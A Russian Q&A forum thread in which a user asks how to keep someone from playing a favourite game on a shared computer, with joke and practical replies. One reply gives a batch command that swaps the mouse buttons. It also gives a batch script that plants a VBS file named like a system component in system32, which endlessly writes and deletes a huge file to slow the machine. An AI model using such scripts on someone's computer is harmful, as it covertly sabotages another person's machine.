Как ограничить компьютер?

Злой ITишник Гуру (3025), закрыт 5 лет назад
Дано (Задрот), любимая игра, компьютер (когда меня нету)
Вопрос как ограничить задрота от любимой игры?
Есть утилиты для ограничения интернета, мощности компьютера?)
Спасибо
Дополнен 5 лет назад
Банальщину не предлагать
Лучший ответ
Радиоактивный Изотоп ☢ Мудрец (14608) 5 лет назад
конечно, направленный Электро магнитный импульс.
Алексей ЩуковМастер (2323) 5 лет назад
"Банальщину не предлагать"
Злой ITишникГуру (3025) 5 лет назад
Можно ссылку?
Желательно без смс и регистраций!
Радиоактивный Изотоп ☢ Мудрец (14608) ru.wikihow.com/создать-электромагнитный-импульс
Остальные ответы
Алексей Щуков Мастер (2323) 5 лет назад
.bat, банально но жестко. Попробуй если это windows 10, запустить на отдельном рабочем столе. И ещё на отдельном рабочем столе можешь запускать кучу видосов со звуком.
Меняет местами значение кнопок мыши (батник)

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

И ещё, не знаю робит или нет

У вашего ламера будет глючить компьютер.

@echo off
echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs
Злой ITишникГуру (3025) 5 лет назад
Скачал NetLimiter и поставил 0
Алексей Щуков Мастер (2323) ну это для инета. я то не знал что ваш домашний задрот играет онлайн